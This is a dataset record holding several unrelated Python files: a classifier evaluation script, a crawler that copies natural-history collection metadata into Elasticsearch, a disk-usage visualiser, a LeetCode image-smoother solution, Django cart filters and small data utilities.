pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\naac,label=data.fe()\ngaac=data.gaac()\nac_p,label=data.deal()\nyaml_string = open('model_arthitecture_2.yaml', 'r')\nmodel = model_from_yaml(yaml_string)\nyaml_string_lstm = open('lstm.yaml', 'r')\nmodel_lstm = model_from_yaml(yaml_string_lstm)\nx_test = np.concatenate(( aac,gaac,ac_p),axis=1)\nprint(x_test.shape)\n\n\nall_labels=[]\nall_prob = {}\nall_prob[0] = []\nreal_labels = []\nfor val in label:\n if val == 1:\n real_labels.append(1)\n else:\n real_labels.append(0)\ntrain_label_new = []\n# global all_labels\n# global all_prob\nall_labels = all_labels + real_labels\n\ndef transfer_label_from_prob(proba):\n label = [1 if val >= 0.6 else 0 for val in proba]\n return label\ndef calculate_performace(test_num, pred_y, labels):\n tp = 0\n fp = 0\n tn = 0\n fn = 
0\n for index in range(test_num):\n if labels[index] == 1:\n if labels[index] == pred_y[index]:\n tp = tp + 1\n else:\n fn = fn + 1\n else:\n if labels[index] == pred_y[index]:\n tn = tn + 1\n else:\n fp = fp + 1\n print('tp:',tp,'fn:',fn,'tn:',tn,'fp:',fp)\n acc = float(tp + tn) / test_num\n precision = float(tp) / (tp + fp)\n sensitivity = float(tp) / (tp + fn)\n specificity = float(tn) / (tn + fp)\n MCC = float(tp * tn - fp * fn) / (np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)))\n return acc, precision, sensitivity, specificity, MCC\nimport joblib\nall_prob_svc={}\nall_prob_svc[0]=[]\ndef threeDependent(model):\n svc_proba = model.predict(x_test)\n all_prob_svc[0] = all_prob_svc[0] + [val for val in svc_proba]\n y_pred_svc = transfer_label_from_prob(svc_proba)\n # acc=calculate_performace(len(real_labels), y_pred_xgb, real_labels)\n acc, precision, sensitivity, specificity, MCC = calculate_performace(len(label), y_pred_svc, label)\n fpr_1, tpr_1, thresholds_1 = roc_curve(all_labels, all_prob_svc[0]) # probas_[:, 1])\n AUC = auc(fpr_1, tpr_1)\n return acc, precision, sensitivity, specificity, MCC,AUC\nall_prob_lstm={}\nall_prob_lstm[0]=[]\nopt = optimizers.Adam(lr=0.001)\n\ndef lstmDependent(model):\n opt = optimizers.Adam(lr=0.001) # 0.01\n model_lstm.compile(optimizer=opt, loss='binary_crossentropy', metrics=['accuracy'])\n model_lstm.fit(x_test, label, batch_size=5, epochs=30)\n lstm_proba = model_lstm.predict_proba(x_test)\n print(lstm_proba)\n all_prob_lstm[0] = all_prob_lstm[0] + [val for val in lstm_proba]\n y_pred_lstm = transfer_label_from_prob(lstm_proba)\n # acc=calculate_performace(len(real_labels), y_pred_xgb, real_labels)\n acc, precision, sensitivity, specificity, MCC = calculate_performace(len(label), y_pred_lstm, label)\n fpr_4, tpr_4, thresholds_4 = roc_curve(all_labels, all_prob_lstm[0]) # probas_[:, 1])\n AUC = auc(fpr_4, tpr_4)\n return acc, precision, sensitivity, specificity, MCC, AUC\n\ndef myDependent(model):\n opt = optimizers.Adam(lr=0.001) # 0.01\n model.compile(optimizer=opt, loss='binary_crossentropy', metrics=['accuracy'])\n model.fit(x_test, label, batch_size=5, epochs=30)\n lstm_cnn_proba = model.predict_proba(x_test)\n print(lstm_cnn_proba)\n all_prob[0] = all_prob[0] + [val for val in lstm_cnn_proba]\n y_pred_lstm_cnn = transfer_label_from_prob(lstm_cnn_proba)\n # acc=calculate_performace(len(real_labels), y_pred_xgb, real_labels)\n print(\"label\",label.shape)\n print(len(y_pred_lstm_cnn))\n acc_lstm_cnn, precision, sensitivity, specificity, MCC = calculate_performace(len(label), y_pred_lstm_cnn, label)\n fpr_3, tpr_3, thresholds_3 = roc_curve(all_labels, all_prob[0]) # probas_[:, 1])\n AUC = auc(fpr_3, tpr_3)\n return acc_lstm_cnn, precision, sensitivity, specificity,MCC,AUC\n\nprint(\"acc, precision, sensitivity, specificity,MCC,AUC\")\nprint(\"------------------------------------------------\")\nsvm_model = joblib.load(\"svm.pkl\")\nacc1, precision1, sensitivity1, specificity1, MCC1, AUC1=threeDependent(svm_model)\n\nx_test = x_test.reshape((x_test.shape[0], x_test.shape[1], 1))\nlabel = np.array(label)\nlabel = label.reshape((label.shape[0], 1))\n\n\nyaml_string_lstm = open('lstm.yaml', 'r')\nmodel_lstm = model_from_yaml(yaml_string_lstm)\nacc2, precision2, sensitivity2, specificity2, MCC2, AUC2=lstmDependent(model_lstm)\n\nyaml_string = open('model_arthitecture_2.yaml', 'r')\nmodel = model_from_yaml(yaml_string)\nacc3, precision3, sensitivity3, specificity3, MCC3, AUC3=myDependent(model)\n\n\nprint(\"svm\",acc1, precision1, sensitivity1, 
specificity1, MCC1, AUC1)\nprint('lstm',acc2, precision2, sensitivity2, specificity2, MCC2, AUC2)\nprint('our',acc3, precision3, sensitivity3, specificity3, MCC3, AUC3)\nprint(\"------------------------------------------------\")\n\n\ndef plot_roc_curve(labels, probality, legend_text, auc_tag=True):\n # fpr2, tpr2, thresholds = roc_curve(labels, pred_y)\n fpr, tpr, thresholds = roc_curve(labels, probality) # probas_[:, 1])\n roc_auc = auc(fpr, tpr)\n if auc_tag:\n rects1 = plt.plot(fpr, tpr, label=legend_text + ' (AUC=%6.3f) ' % roc_auc)\n else:\n rects1 = plt.plot(fpr, tpr, label=legend_text)\n\nplt.savefig('路径', dpi=300) #指定分辨\n\n\n# plt.boxplot(x = (Acc_svm,Acc_rfc,Acc_lstm_cnn,Acc_lstm),\n# patch_artist=True,\n# labels = ('SVM','RF','proposed method','LSTM'), # 添加x轴的刻度标签\n# showmeans=True,showfliers=True,\n # boxprops = {'color':'black','facecolor':'steelblue'},\n # flierprops = {'marker':'o','markerfacecolor':'red', 'markersize':5},\n # meanprops = {'marker':'D','markerfacecolor':'indianred', 'markersize':4},\n # medianprops={'linestyle':'--','color':'orange'}\n # )\n# plot_roc_curve(all_labels, all_prob_svc[0], 'SVM method')\n# plot_roc_curve(all_labels, all_prob_rfc[0], 'RF method')\n# plot_roc_curve(all_labels, all_prob[0], 'proposed method')\n# plot_roc_curve(all_labels, all_prob_lstm[0], 'LSTM method')\n# plt.plot([0, 1], [0, 1], 'k--')\n# plt.xlim([-0.05, 1])\n# plt.ylim([0, 1.05])\n# plt.title('ROC')\n# plt.legend(loc=\"lower right\")\n# plt.savefig(save_fig_dir + selected + '_' + class_type + '.png')\n# plt.show()\n\n\n# rfc_model = joblib.load(\"rfc.pkl\")\n# rfc_proba = rfc_model.predict(x_test)\n# all_prob_rfc[0] = all_prob_rfc[0] + [val for val in rfc_proba]\n# y_pred_rfc = transfer_label_from_prob(rfc_proba)\n# # acc=calculate_performace(len(real_labels), y_pred_xgb, real_labels)\n# acc_rfc, precision, sensitivity, specificity, MCC = calculate_performace(len(label), y_pred_rfc, label)\n# ACC_rfc.append(acc_rfc)","sub_path":"QSP400/independent_Ver.py","file_name":"independent_Ver.py","file_ext":"py","file_size_in_byte":6808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"150328666","text":"import requests,json, sys, collections, argparse\r\nfrom requests.auth import HTTPBasicAuth\r\nfrom transfer_mars_lib import *\r\nfrom elasticsearch import Elasticsearch\r\nimport copy\r\n\r\nes=None\r\ncreate_es=False\r\n\r\nroot_list_institutions=\"https://collections.naturalsciences.be/cpb/nh-collections/institutions/institutions\"\r\nurl_suffix_collection=\"/2-cetaf-passport-collections/collections/collections\"\r\nurl_suffix_geo=\"/collection_geography\"\r\nurl_suffix_mids=\"/list-mids\"\r\nsearch_index=\"cetaf_passport_collections\"\r\ndata_index=\"cetaf_passport_collections_full\"\r\nes_server_name=None\r\ncurrent_institution_name=\"\"\r\ncurrent_institution_url=\"\"\r\ncheck_date=None\r\ncheck_date_default=\"2021-01-01T00:00:00+02:00\"\r\nall_arrays={}\r\nparent_children={}\r\n\r\n\r\n\r\ndef get_mids(p_url, es_content_full, auth_mars):\r\n print(\"MIDS_URL\")\r\n print(p_url)\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n mids_geography_category = get_value_field(p_dict,\"mids_geography_category\")\r\n mids_geography_mids_0 = get_value_field(p_dict,\"mids-geography_mids_0\")\r\n mids_geography_mids_1 = get_value_field(p_dict,\"mids-geography_mids_1\")\r\n mids_geography_mids_2 = 
get_value_field(p_dict,\"mids-geography_mids_2\")\r\n mids_geography_mids_3 = get_value_field(p_dict,\"mids-geography_mids_3\")\r\n mids_quantity = get_value_field(p_dict,\"mids-geography_object_quantity\")\r\n if not mids_quantity is None: \r\n mids={}\r\n #TEMP\r\n mids[\"taxonomic_category_name\"]=es_content_full[\"coverage_fields\"][\"main_category\"]\r\n mids[\"taxonomic_category_title\"]=es_content_full[\"coverage_fields\"][\"main_category\"]\r\n mids[\"countries_and_areas\"]=[] \r\n tmp_ctry={} \r\n tmp_ctry[\"area_type\"]=\"TDWG Zone\"\r\n tmp_ctry[\"area_name\"]=mids_geography_category\r\n mids[\"countries_and_areas\"].append(tmp_ctry)\r\n mids[\"taxonomic_category_quantity\"]=mids_quantity\r\n mids[\"taxonomic_category_mids_0_pc\"]=mids_geography_mids_0\r\n mids[\"taxonomic_category_mids_1_pc\"]=mids_geography_mids_1\r\n mids[\"taxonomic_category_mids_2_pc\"]=mids_geography_mids_2\r\n mids[\"taxonomic_category_mids_3_pc\"]=mids_geography_mids_3\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"taxonomic_category\"].append(mids)\r\n return mids_geography_category, mids_quantity, mids_geography_mids_0, mids_geography_mids_1, mids_geography_mids_2, mids_geography_mids_3\r\n\r\n\r\n\r\ndef explore_mids(p_url, es_content_full, auth_mars):\r\n global url_suffix_mids\r\n url_mids=p_url+url_suffix_mids\r\n print(\"MIDS_EXPLORE_URL\")\r\n print(url_mids)\r\n data=requests.get(url_mids, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n print(p_dict)\r\n sum_mids={}\r\n if \"items\" in p_dict:\r\n for item in p_dict[\"items\"]:\r\n print(item)\r\n if \"@type\" in item:\r\n if item[\"@type\"]==\"collection_mids_geography\":\r\n url=item[\"@id\"]\r\n mids_geography_category, mids_quantity, mids_geography_mids_0, mids_geography_mids_1, mids_geography_mids_2, mids_geography_mids_3 = get_mids(url, es_content_full, auth_mars)\r\n #print(\"mids_quantity\")\r\n #print(mids_quantity)\r\n #print(cast_to_int(mids_quantity))\r\n sum_tmp={}\r\n sum_tmp[\"quantity\"]=cast_to_int(mids_quantity)\r\n sum_tmp[\"mids_0\"]=cast_to_numeric(mids_geography_mids_0)\r\n sum_tmp[\"mids_1\"]=cast_to_numeric(mids_geography_mids_1)\r\n sum_tmp[\"mids_2\"]=cast_to_numeric(mids_geography_mids_2)\r\n sum_tmp[\"mids_3\"]=cast_to_numeric(mids_geography_mids_3)\r\n print(\"SUM_TMP\")\r\n print(sum_tmp)\r\n sum_mids[url]=sum_tmp\r\n #sum\r\n sum=0\r\n sum_mids0=0\r\n sum_mids1=0\r\n sum_mids2=0\r\n sum_mids3=0\r\n for key, sum_elem in sum_mids.items():\r\n sum += sum_elem[\"quantity\"]\r\n sum_mids0+=sum_elem[\"mids_0\"]/100*sum_elem[\"quantity\"]\r\n sum_mids1+=sum_elem[\"mids_1\"]/100*sum_elem[\"quantity\"]\r\n sum_mids2+=sum_elem[\"mids_2\"]/100*sum_elem[\"quantity\"]\r\n sum_mids3+=sum_elem[\"mids_3\"]/100*sum_elem[\"quantity\"]\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"sum_quantity\"]=sum\r\n if sum !=0:\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"sum_mids_0\"]=round((float(sum_mids0)/float(sum))*100,3)\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"sum_mids_1\"]=round((float(sum_mids1)/float(sum))*100,3)\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"sum_mids_2\"]=round((float(sum_mids2)/float(sum))*100,3)\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"sum_mids_3\"]=round((float(sum_mids3)/float(sum))*100,3)\r\n \r\ndef add_collection_es(index_name, current_id, es_content):\r\n global es\r\n 
es.update(index=index_name,id=current_id,body={'doc': es_content,'doc_as_upsert':True})\r\n\r\ndef find_parent(child_id):\r\n global parent_children\r\n for key, items in parent_children.items():\r\n for item in items:\r\n if item==child_id:\r\n return key\r\n return None \r\n \r\ndef explore_sub_collection_detail(p_url, p_dict,parent_url, auth_mars):\r\n global parent_children\r\n current_json={}\r\n print(p_dict)\r\n if parent_url in parent_children:\r\n tmp=parent_children[parent_url]\r\n else:\r\n tmp=[]\r\n tmp.append(p_url)\r\n parent_children[parent_url]=tmp\r\n copy_collection(p_url, p_dict, auth_mars, True)\r\n\r\ndef explore_sub_collection(p_url, parent_url, auth):\r\n global check_date\r\n #print(p_url)\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n if \"modified\" in p_dict:\r\n modified=p_dict[\"modified\"]\r\n if modified>check_date:\r\n #print(\"UPDATE!!!\")\r\n #print(modified)\r\n explore_sub_collection_detail(p_url, p_dict, parent_url, auth)\r\n \r\n\r\ndef parse_sub_collection_index(p_dict, elem, parent_url, auth_mars):\r\n if elem in p_dict:\r\n #print(\"INDEX\")\r\n #print(p_dict[elem])\r\n for item in p_dict[elem]:\r\n item_type=item[\"@type\"]\r\n coll_url=item[\"@id\"]\r\n print(\"TEST=\"+coll_url)\r\n if item_type==\"nh_sub_collection\":\r\n print(\"SUB_COLLECTION\")\r\n print(coll_url)\r\n explore_sub_collection(coll_url, parent_url, auth_mars)\r\n \r\ndef get_geography(p_url, auth_mars):\r\n print(\"URL_GEO=\")\r\n print(p_url)\r\n returned=[] \r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n #print(p_dict)\r\n if \"countries\" in p_dict:\r\n if not p_dict[\"countries\"] is None:\r\n if isinstance(p_dict[\"countries\"], list):\r\n for item in sorted(p_dict[\"countries\"]):\r\n returned.append(item)\r\n return returned \r\n \r\n \r\ndef copy_collection(p_url, p_dict, auth_mars, sub_collection=False):\r\n global es\r\n global search_index\r\n global data_index\r\n global current_institution_name\r\n global current_institution_url\r\n global all_arrays\r\n global parent_children\r\n global url_suffix_geo\r\n print(\"------------------------\")\r\n print(\"FILL_URL\")\r\n print(p_url)\r\n print(\"------------------------\")\r\n json_parent=None\r\n current_json={}\r\n current_json_full={}\r\n current_json[\"coverage_fields\"]={}\r\n current_json[\"coverage_fields\"][\"countries_and_areas\"]=[]\r\n current_json[\"size_and_digitisation_fields\"]={}\r\n \r\n current_id=p_url\r\n \r\n current_json[\"institution_name\"]=current_institution_name\r\n current_json[\"to_parent_institution\"]=current_institution_url\r\n \r\n name_collection=get_value_field(p_dict, \"description\")\r\n \r\n \r\n size_collection=get_value_field(p_dict, \"number_of_specimens_\")\r\n if not size_collection is None:\r\n current_json[\"size_and_digitisation_fields\"][\"specimens_count\"]=size_collection\r\n \r\n #after child explore=> geo\r\n if not name_collection is None:\r\n if sub_collection:\r\n url_parent=find_parent(p_url)\r\n print(\"URL_PARENT=\")\r\n print(url_parent)\r\n json_parent=all_arrays[url_parent]\r\n current_json[\"coverage_fields\"][\"main_category\"]=\"Sub collection\"\r\n #current_json[\"coverage_fields\"][\"main_category\"]=json_parent[\"coverage_fields\"][\"main_category\"]\r\n #current_json[\"coverage_fields\"][\"taxonomic_discipline\"]=name_collection\r\n else:\r\n 
current_json[\"coverage_fields\"][\"main_category\"]=\"main collection\"\r\n #current_json[\"coverage_fields\"][\"main_category\"]=name_collection\r\n current_json[\"coverage_fields\"][\"taxonomic_discipline\"]=name_collection\r\n areas={}\r\n areas=get_geography(p_url+url_suffix_geo, auth_mars)\r\n for area in areas:\r\n print(area)\r\n new_area={}\r\n new_area[\"area_name\"]=area\r\n current_json[\"coverage_fields\"][\"countries_and_areas\"].append(new_area)\r\n all_arrays[p_url]=current_json\r\n parse_sub_collection_index(p_dict, \"items\", p_url, auth_mars)\r\n es_content=current_json\r\n \r\n add_collection_es(search_index, current_id,es_content)\r\n es_content_full=copy.deepcopy(es_content)\r\n \r\n #es_content_full[\"coverage_fields\"].pop(\"taxonomic_discipline\", None)\r\n #es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"]={}\r\n #GOOD ?\r\n es_content_full[\"coverage_fields\"][\"name_taxonomic_category\"]=name_collection\r\n abstract=get_value_field(p_dict, \"abstract\")\r\n es_content_full[\"collection_abstract\"]=abstract\r\n description=get_value_field(p_dict, \"description\")\r\n es_content_full[\"collection_description\"]=description\r\n \r\n types_count=get_value_field(p_dict, \"primary_types\")\r\n es_content_full[\"size_and_digitisation_fields\"][\"primary_types_count\"]=types_count\r\n \r\n units=get_value_field(p_dict, \"number_of_units\")\r\n es_content_full[\"size_and_digitisation_fields\"][\"units_count\"]=format_if_not_none(units)\r\n \r\n others=get_value_field(p_dict, \"other_size_indicator\")\r\n es_content_full[\"size_and_digitisation_fields\"][\"other_size_indicators\"]=others\r\n \r\n owc=get_value_field(p_dict, \"owc_evaluation\")\r\n es_content_full[\"size_and_digitisation_fields\"][\"owc_size_evaluation\"]=owc\r\n es_content_full[\"coverage_fields\"].pop(\"taxonomic_discipline\", None)\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"]={}\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"taxonomic_category\"]=[]\r\n explore_mids(p_url, es_content_full, auth_mars)\r\n print(\"ES_CONTENT_FULL===>\")\r\n print(es_content_full)\r\n add_collection_es(data_index, current_id,es_content_full)\r\n #es.update(index=search_index,id=current_id,body={'doc': es_content,'doc_as_upsert':True})\r\n\r\ndef get_collection(p_url, auth_mars):\r\n print(p_url)\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n #print(dict)\r\n not_null_id=p_dict[\"collection_id\"]\r\n print(\"collection_name\")\r\n print(not_null_id)\r\n if not not_null_id is None:\r\n print(\"PARSE___!\")\r\n copy_collection(p_url,p_dict, auth_mars )\r\n \r\ndef parse_collections(p_url, auth_mars):\r\n print(\"collection list:\")\r\n print(p_url)\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n list_collections=p_dict[\"items\"]\r\n print(list_collections)\r\n for item in list_collections:\r\n print(item)\r\n if item[\"@type\"]==\"nh_collection\":\r\n print(\"go\")\r\n get_collection(item[\"@id\"], auth_mars)\r\n\r\n \r\n\r\n#def parse_institution_detail(p_url):\r\n# parse_collections(p_url)\r\n\r\ndef parse_institution(p_url, auth_mars):\r\n global url_suffix_collection\r\n global current_institution_name\r\n global current_institution_url\r\n current_institution_name=\"\"\r\n current_institution_url=\"\"\r\n data=requests.get(p_url, 
headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n\r\n name_museum=p_dict[\"title\"]\r\n print(name_museum)\r\n if not name_museum is None:\r\n if len(name_museum.lower().strip())>0:\r\n current_institution_name=name_museum\r\n current_institution_url=p_dict[\"@id\"]\r\n parse_collections(p_url+url_suffix_collection, auth_mars)\r\n \r\ndef get_collections(p_url, auth_mars):\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n go=True\r\n i=0\r\n while go:\r\n current=p_dict[\"batching\"][\"@id\"]\r\n if \"next\" in p_dict[\"batching\"]:\r\n next=p_dict[\"batching\"][\"next\"]\r\n last=p_dict[\"batching\"][\"last\"]\r\n \r\n for inst in p_dict[\"items\"]:\r\n print(i)\r\n #print(inst[\"@id\"])\r\n data2=requests.get(inst[\"@id\"], headers={'accept':'application/json'}, auth=auth_mars)\r\n dict2=json.loads(data2.text)\r\n if \"institution_id\" in dict2:\r\n #print(\"IS_MUSEUM\")\r\n parse_institution( inst[\"@id\"], auth_mars)\r\n i=i+1\r\n if current==last:\r\n go=False\r\n else:\r\n #print(\"GO NEXT\" + next)\r\n data=requests.get(next, headers={'accept':'application/json'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n \r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--es_server\")\r\n parser.add_argument(\"--check_date\", default=check_date_default)\r\n parser.add_argument(\"--user_mars\")\r\n parser.add_argument(\"--password_mars\")\r\n \r\n args = parser.parse_args()\r\n check_date=args.check_date\r\n print(check_date)\r\n print(args.es_server)\r\n es = Elasticsearch(\r\n [args.es_server], \r\n use_ssl = False,\r\n port=9200,\r\n timeout=30\r\n )\r\n #get_collections(root_list_institutions)\r\n auth_mars = HTTPBasicAuth(args.user_mars, args.password_mars)\r\n get_collections(root_list_institutions, auth_mars)\r\n #parse_institution(\"https://collections.naturalsciences.be/cpb/nh-collections/countries/germany/de-zfmk\", auth_mars)","sub_path":"CETAF_DEVELOPMENTS/release_scripts/transfer_mars_collections.py","file_name":"transfer_mars_collections.py","file_ext":"py","file_size_in_byte":14725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"226383239","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 25 16:32:27 2019\n\n@author: Thomas Kastl\n\"\"\"\n\nimport json\nimport gzip\nimport pandas as pd\nfrom collections import namedtuple\nimport os\nimport glob\nimport math\nfrom datetime import datetime\n\nimport plotly.graph_objects as go\n\ndef convert_size(size_bytes):\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 1)\n return \"%s %s\" % (s, size_name[i])\n\ndef get_most_recent_json_log(path_logs):\n # Get most recent logs folder:\n try:\n path_logs_folder = max(glob.glob(os.path.join(path_logs, '*/')),\n key=os.path.getmtime)\n except ValueError as e:\n raise Exception(\"Error with the path provided: Either not a path or\"+\\\n \"path does not contain subfolders!\") from e\n \n # Grab path to zipped log file and test:\n path_zipped_json = os.path.join(path_logs_folder, \"scan.json\")\n \n if not os.path.isfile(path_zipped_json):\n raise ValueError(\"Most recent folder does not contain logfile. 
\\n\"+\\\n \"Maybe indexing not finished / crashed?\")\n return path_zipped_json\n\ndef read_json_log_to_dataframe(path_logs, maxlevels=None):\n path_zipped_json = get_most_recent_json_log(path_logs)\n \n with gzip.open(path_zipped_json) as file:\n jsonfile = json.load(file)\n \n # Slightly complicated way to extract the root folder from the indexing \n # algorithm's output. Necessary since dict's aren't indexed.\n headnode = [node for node in jsonfile[\"root\"][\"children\"].values()][0]\n \n # Keeping and updating lists of namedtuple is significantly faster than building\n # the final pandas dataframe during recursion:\n FolderEntry = namedtuple(\"FolderEntry\", [\"parentpath\", \"abspath\", \n \"name\", \"size\", \"count\", \"level\"])\n \n # Recursive function crawls all possible folder paths:\n def getIndices(node, parentpath, parentlevel):\n # Collect info about this folder:\n abspath = parentpath + \"/\" + node[\"name\"]\n level = parentlevel+1\n folder_entry = FolderEntry(parentpath, \n abspath, \n node[\"name\"], \n node[\"size\"],\n node[\"count\"],\n level)\n \n # Recursively collect info about subfolders:\n subfolder_lists = [getIndices(subnode, abspath, level) for subnode in node[\"children\"].values()]\n \n # Each getIndices returns a list. subfolder_entries is therefore a list\n # of lists and needs to be flattened:\n # (See https://stackoverflow.com/a/952952/4629950)\n subfolder_entries = [item for sublist in subfolder_lists for item in sublist]\n \n # Add this folder to subfolder and return the result upwards:\n subfolder_entries.append(folder_entry)\n return subfolder_entries\n \n list_of_entries = getIndices(headnode, \"\", 0)\n df = pd.DataFrame(list_of_entries)\n \n # Filter maximum levels if set to reduce size of output:\n if maxlevels is not None:\n df = df.query(\"level <= {}\".format(maxlevels))\n \n # Get size strings (kB, MB, GB...) 
for easier reading:\n df[\"size_string\"] = df[\"size\"].apply(convert_size)\n \n # Read scan time for additional feedback:\n scan_time = datetime.utcfromtimestamp(jsonfile[\"scan_time\"]).strftime('%Y-%m-%d %H:%M:%S')\n \n return(df, scan_time)\n\n\ndef visualize_folder_scan(save_directory, maxlevels=5, showlevels=3, agg_type=\"size\"):\n df_data, scan_time = read_json_log_to_dataframe(save_directory, maxlevels=maxlevels)\n \n # Reconstruct scan path from df:\n top_level_path = df_data.query(\"parentpath==''\")[\"abspath\"].iloc[0]\n \n # Collect arguments to figure constructor:\n fig_args = {\n \"ids\": df_data.abspath,\n \"labels\": df_data.name,\n \"parents\": df_data.parentpath,\n \"values\": df_data[\"size\"],\n \"hovertext\": df_data.name,\n \"hoverinfo\": \"text\",\n \"domain\": dict(column=0),\n \"branchvalues\": \"total\",\n \"textinfo\": \"none\",\n \"customdata\": df_data[\"size_string\"],\n \"hovertemplate\": \"%{label}: %{customdata} %{id}\",\n \"name\": \"filesize_chart\",\n \"maxdepth\": showlevels+1 # Increase by 1 because first \"level\" is just the top level folder.\n }\n \n # Switch visualization to file count per folder if requested:\n if agg_type==\"count\":\n fig_args[\"values\"]=df_data[\"count\"]\n fig_args[\"hovertemplate\"]= \"%{label}: %{value} Files %{id}\"\n fig_args[\"customdata\"]= None\n \n # Create and show figure:\n fig = go.Figure()\n fig.add_trace(go.Sunburst(**fig_args))\n fig.update_layout(margin = dict(t=40, l=0, r=0, b=0),\n width=800, height=600,\n title = {\"text\": \"Disk usage visualization of {} @ {}\".format(top_level_path,\n scan_time)})\n fig.show()","sub_path":"dv/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"79322804","text":"from copy import deepcopy as copy\nclass Solution:\n def imageSmoother(self, M):\n \"\"\"\n :type M: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n row = len(M)\n col = len(M[0]) if row else 0\n ret = copy(M)\n for i in range(row):\n for j in range(col):\n nei = [\n M[a][b]\n for a in (i-1, i, i+1)\n for b in (j-1, j, j+1)\n if 0 <= a < row and 0 <= b < col\n ]\n ret[i][j] = sum(nei) // len(nei)\n return ret\n\n'''\nan unsatisfied ans\n'''\n","sub_path":"algorithms/python/661.Image Smoother.py","file_name":"661.Image Smoother.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"366733227","text":"from django import template\nfrom decimal import Decimal\n\n\n\nregister = template.Library()\n\n\n@register.filter(name='offer_price_start')\ndef offer_price_start(queryset):\n return queryset.first().price\n\n\n@register.filter(name=\"cart_quantity\")\ndef cart_quantity(package_id, cart):\n keys = cart.keys()\n for id in keys:\n if int(id) == package_id.id:\n return cart.get(id)\n return 0\n\n\n@register.filter(name='cart_total')\ndef cart_total(package_id, cart):\n if package_id.price:\n return package_id.price * cart_quantity(package_id, cart)\n else:\n pass\n\n\n#subtotal\n@register.filter(name='get_subtotal_cart_total')\ndef get_subtotal_cart_total(package_id, cart):\n\tsubtotal = 0\n\tfor p in package_id:\n\t\tsubtotal += cart_total(p, cart)\n\treturn subtotal\n\n\n\n\n@register.filter(name=\"total_with_service_fee\")\ndef get_total_with_service_fee(package_id, cart):\n total = 0\n service_fee = 0.25\n for p in package_id:\n total += cart_total(p, cart) + Decimal(service_fee)\n 
return total","sub_path":"mainApp/templatetags/custom_filter.py","file_name":"custom_filter.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"372650687","text":"import zipfile\nimport pandas as pd\nimport tqdm\nimport json\n\n\ndef unzip(filepath, out_dir):\n with zipfile.ZipFile(filepath, 'r') as zip_ref:\n zip_ref.extractall(out_dir)\n\n\ndef glimpse(path):\n df = pd.read_csv(path, nrows=5)\n display(df.head(), pd.DataFrame(list(df.columns), columns=['columns']))\n\n\ndef event_data_to_json(input_file, output_file, chunksize=1000000):\n with open(output_file, 'w') as f:\n for item in tqdm.tqdm_notebook(pd.read_csv(input_file, chunksize=chunksize, usecols=['event_data'])):\n for line in item['event_data']:\n f.write(line)\n f.write('\\n')\n\n\ndef get_event_data_keys(json_data):\n for k, v in json_data.items():\n if isinstance(v, dict):\n for kk in get_event_data_keys(v):\n yield '{}.{}'.format(k, kk)\n else:\n yield k\n\n\ndef make_json_keys_set(path, result_set, chunksize=500000):\n chunks = pd.read_csv(path, usecols=['event_data'], converters={'event_data': json.loads}, chunksize=chunksize)\n for chunk in tqdm.tqdm_notebook(chunks):\n series_of_chunk_cols = map(lambda x: set(get_event_data_keys(x)), chunk['event_data'].values)\n chunk_cols = set.union(*list(series_of_chunk_cols))\n result_set = set.union(result_set, chunk_cols)\n return result_set\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"334752657","text":"import unittest\nfrom openpatch_format.api.v1.formats.fill_in import FillIn\nfrom tests.api.v1.formats import TestFormat\n\n\nclass TestFillIn(TestFormat, unittest.TestCase):\n Format = FillIn\n\n def test_validate_regex(self):\n task = {\n \"format_type\": 